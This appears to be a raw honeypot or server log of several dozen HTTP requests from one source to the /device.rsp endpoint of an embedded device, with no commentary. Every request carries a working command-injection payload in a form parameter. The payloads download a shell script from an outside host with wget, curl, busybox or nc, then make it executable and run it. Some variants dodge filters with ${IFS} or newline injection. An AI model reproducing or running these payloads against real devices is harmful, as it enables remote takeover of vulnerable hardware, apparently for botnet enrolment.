User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:47530
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:30:28] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+%3Ekla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 176
Content-Type: application/x-www-form-urlencoded
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:51966
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:30:18] === HTTP Request ===
===================
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:38204
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+%3Ekla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+%3Ekla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: GET
[2026-03-20 17:30:09] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3B%28toybox+nc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%29%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 312
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:36654
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:29:52] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%24%7BIFS%7D%2Ftmp%3Brm+-f%24%7BIFS%7Dkla.sh%3Bwget+-O%24%7BIFS%7Dkla.sh%24%7BIFS%7Dhttp%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777%24%7BIFS%7Dkla.sh%3Bsh%24%7BIFS%7Dkla.sh%24%7BIFS%7Dtbk%26
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 247
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:34218
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:29:34] === HTTP Request ===
===================
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:52330
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%24%7BIFS%7D%2Ftmp%3Brm+-f%24%7BIFS%7Dkla.sh%3Bwget+-O%24%7BIFS%7Dkla.sh%24%7BIFS%7Dhttp%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777%24%7BIFS%7Dkla.sh%3Bsh%24%7BIFS%7Dkla.sh%24%7BIFS%7Dtbk%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%24%7BIFS%7D%2Ftmp%3Brm+-f%24%7BIFS%7Dkla.sh%3Bwget+-O%24%7BIFS%7Dkla.sh%24%7BIFS%7Dhttp%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777%24%7BIFS%7Dkla.sh%3Bsh%24%7BIFS%7Dkla.sh%24%7BIFS%7Dtbk%26
Method: GET
[2026-03-20 17:29:25] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=curl+-sL+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 133
Content-Type: application/x-www-form-urlencoded
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:49186
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:29:06] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bcurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 173
Content-Type: application/x-www-form-urlencoded
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:40762
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:28:54] === HTTP Request ===
===================
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:41544
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bcurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bcurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: GET
[2026-03-20 17:28:36] === HTTP Request ===
===================
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:58842
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Fvar%2Frun+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+%2Bx+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Fvar%2Frun+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+%2Bx+kla.sh%3Bsh+kla.sh+tbk+%26
Method: GET
[2026-03-20 17:28:05] === HTTP Request ===
===================
Content-Length: 0
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:41486
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos%0Acd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdc=
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos%0Acd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdc=
Method: POST
[2026-03-20 17:27:41] === HTTP Request ===
===================
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 0
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:58470
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdb=sos
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdb=sos
Method: POST
[2026-03-20 17:27:20] === HTTP Request ===
===================
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:56004
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdb=sos
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdb=sos
Method: GET
[2026-03-20 17:27:02] === HTTP Request ===
===================
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:36232
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%0acd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%0acd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bsh+kla.sh+tbk+%26
Method: POST
[2026-03-20 17:26:50] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%0acd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bsh+kla.sh+tbk+%26
Content-Length: 157
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:35634
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:26:33] === HTTP Request ===
===================
Body: mdc=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29&mdb=sos&opt=sys&cmd=___S_O_S_T_R_E_A_MAX___
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 669
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:56830
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:26:16] === HTTP Request ===
===================
Body: mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdb=sos&opt=sys&cmd=___S_O_S_T_R_E_A_MAX___
Content-Length: 171
Content-Type: application/x-www-form-urlencoded
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:43100
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:25:58] === HTTP Request ===
===================
Body: mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdb=sos&opt=sys&cmd=___S_O_S_T_R_E_A_MAX___
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 171
Content-Type: application/x-www-form-urlencoded
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:44844
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:25:52] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=%24%28wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26%29
Content-Length: 143
Content-Type: application/x-www-form-urlencoded
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:42624
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:25:40] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=%24%28wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26%29
Content-Length: 143
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:56998
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:25:32] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox+wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26
Content-Length: 142
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:41396
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:25:21] === HTTP Request ===
===================
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:41330
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox+wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox+wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26
Method: GET
[2026-03-20 17:25:13] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26
Content-Length: 134
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:36360
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:24:59] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 134
Content-Type: application/x-www-form-urlencoded
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:41442
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:24:49] === HTTP Request ===
===================
Cookie: uid=admin
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:57864
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26
Method: GET
[2026-03-20 17:24:35] === HTTP Request ===
===================
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:54022
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26
Method: GET
[2026-03-20 17:24:21] === HTTP Request ===
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:34126
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26
Method: GET
[2026-03-20 17:24:10] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 171
Content-Type: application/x-www-form-urlencoded
Cookie: uid=admin
Accept: */*
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:52192
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:23:54] === HTTP Request ===
===================
Body: opt=sys&cmd=__S_O_S_T_R_E_A_MAX__&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 169
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:37278
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:23:39] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 0
Cookie: uid=1
Accept: */*
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:42890
Query: opt=sys&cmd=__S_O_S_T_R_E_A_MAX__&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=__S_O_S_T_R_E_A_MAX__&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: POST
[2026-03-20 17:23:29] === HTTP Request ===
===================
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:55526
Query: opt=sys&cmd=__S_O_S_T_R_E_A_MAX__&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=__S_O_S_T_R_E_A_MAX__&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: GET
[2026-03-20 17:23:16] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+-O+kla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Content-Length: 171
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:58132
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:23:06] === HTTP Request ===
===================
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:58026
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+-O+kla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+-O+kla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: GET
[2026-03-20 17:22:53] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+k%3Bwget+-O+k+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+k%3Bsh+k+tbk+%26
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 151
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:37254
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:22:39] === HTTP Request ===
===================
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:33516
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+k%3Bwget+-O+k+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+k%3Bsh+k+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+k%3Bwget+-O+k+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+k%3Bsh+k+tbk+%26
Method: POST
[2026-03-20 17:22:30] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Cookie: uid=1
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:55608
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+k%3Bwget+-O+k+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+k%3Bsh+k+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+k%3Bwget+-O+k+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+k%3Bsh+k+tbk+%26
Method: GET
[2026-03-20 17:22:17] === HTTP Request ===
===================
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:35324
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+k%3Bwget+-O+k+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+k%3Bsh+k+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+k%3Bwget+-O+k+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+k%3Bsh+k+tbk+%26
Method: GET
[2026-03-20 17:22:07] === HTTP Request ===
===================
